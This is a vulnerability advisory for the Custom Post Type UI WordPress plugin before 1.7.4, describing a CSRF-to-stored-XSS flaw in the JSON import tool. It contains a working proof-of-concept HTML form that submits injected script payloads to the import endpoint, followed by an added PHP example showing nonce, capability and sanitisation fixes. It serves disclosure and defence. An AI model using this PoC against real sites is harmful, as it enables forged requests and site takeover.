Custom Post Type UI < 1.7.4 - CSRF to Stored XSS
Description
The Custom Post Type UI WordPress plugin was vulnerable to Cross-Site Request Forgery (CSRF) and Stored Cross-Site Scripting (XSS) within the "Import Post Types" functionality in the "Tools" tab. This functionality allows users to import "Post Types" from other websites, or from backup, as JSON. This could allow an attacker to execute arbitrary JavaScript in a victim's browser, if the attacker could entice the authenticated victim to visit a page they controlled. If successfully exploited, this vulnerability could lead to full site compromise.
Proof of Concept
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://jetpack.local/wp-admin/admin.php?page=cptui_tools" method="POST">
      <!-- the attribute is single-quoted so the JSON's double quotes are not cut off by the HTML parser -->
      <input type="hidden" name="cptui_post_import" value='{"slug":{"name":"<script>alert(1)<\/script>","label":"<script>alert(1)<\/script>","singular_label":"<script>alert(1)<\/script>","description":"<script>alert(1)<\/script>","public":"true","publicly_queryable":"true","show_ui":"true","show_in_nav_menus":"true","delete_with_user":"false","show_in_rest":"true","rest_base":"","rest_controller_class":"","has_archive":"false","has_archive_string":"","exclude_from_search":"false","capability_type":"post","hierarchical":"false","rewrite":"true","rewrite_slug":"","rewrite_withfront":"true","query_var":"true","query_var_slug":"","menu_position":"","show_in_menu":"true","show_in_menu_string":"","menu_icon":"","supports":["title","editor","thumbnail"],"taxonomies":[],"labels":{"menu_name":"","all_items":"","add_new":"","add_new_item":"","edit_item":"","new_item":"","view_item":"","view_items":"","search_items":"","not_found":"","not_found_in_trash":"","parent_item_colon":"","featured_image":"","set_featured_image":"","remove_featured_image":"","use_featured_image":"","archives":"","insert_into_item":"","uploaded_to_this_item":"","filter_items_list":"","items_list_navigation":"","items_list":"","attributes":"","name_admin_bar":"","item_published":"","item_published_privately":"","item_reverted_to_draft":"","item_scheduled":"","item_updated":""},"custom_supports":""}}' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
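An added example, not Custom Post Type UI's own code, of the two controls whose absence produces this CSRF-to-stored-XSS chain in a WordPress import handler: a per-user nonce verified with check_admin_referer() before the posted JSON is touched, and sanitisation of the imported name/label/singular_label/description fields before they are saved. The function names, nonce action and option name are hypothetical.

```php
<?php
// Added example, not Custom Post Type UI's own code: a hypothetical admin
// handler for a JSON "import post types" form. It shows the two controls
// whose absence yields CSRF-to-stored-XSS: a nonce bound to the logged-in
// user and sanitisation of every imported field before it is stored.
// Form side: the nonce field travels with the textarea (action name is made up).
function example_cpt_import_form() {
    echo '<form method="post">';
    wp_nonce_field( 'example_cpt_import', 'example_cpt_import_nonce' );
    echo '<textarea name="cptui_post_import"></textarea>';
    submit_button( 'Import' );
    echo '</form>';
}

// Accept only known text fields and strip tags from each, so a value such as
// "<script>alert(1)</script>" in name/label/description cannot reach storage.
function example_sanitize_post_type( array $raw ) {
    $clean = array();
    foreach ( array( 'name', 'label', 'singular_label', 'description' ) as $key ) {
        $clean[ $key ] = sanitize_text_field( isset( $raw[ $key ] ) ? $raw[ $key ] : '' );
    }
    $clean['name'] = sanitize_key( $clean['name'] ); // slug: lowercase [a-z0-9_-] only
    return $clean;
}

function example_cpt_import_handler() {
    if ( empty( $_POST['cptui_post_import'] ) ) {
        return;
    }
    // Authorisation: only users who may manage options get to define post types.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions' );
    }
    // CSRF control: a form on another origin cannot know this per-user nonce,
    // so check_admin_referer() dies before any of the posted JSON is used.
    check_admin_referer( 'example_cpt_import', 'example_cpt_import_nonce' );

    $decoded = json_decode( wp_unslash( $_POST['cptui_post_import'] ), true );
    if ( ! is_array( $decoded ) ) {
        wp_die( 'Import data is not valid JSON' );
    }
    $types = array();
    foreach ( $decoded as $slug => $fields ) {
        if ( is_array( $fields ) ) {
            $types[ sanitize_key( $slug ) ] = example_sanitize_post_type( $fields );
        }
    }
    update_option( 'example_cpt_post_types', $types );
}
add_action( 'admin_init', 'example_cpt_import_handler' );
```

The stored values must still be escaped with esc_html() or esc_attr() wherever the admin screen renders them; sanitising on input is a second line of defence, not a substitute for output encoding.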
Miscellaneous
Verified: No
Timeline
Publicly Published: 2020-03-17
Added: 2020-03-20
Last Updated: 2020-03-23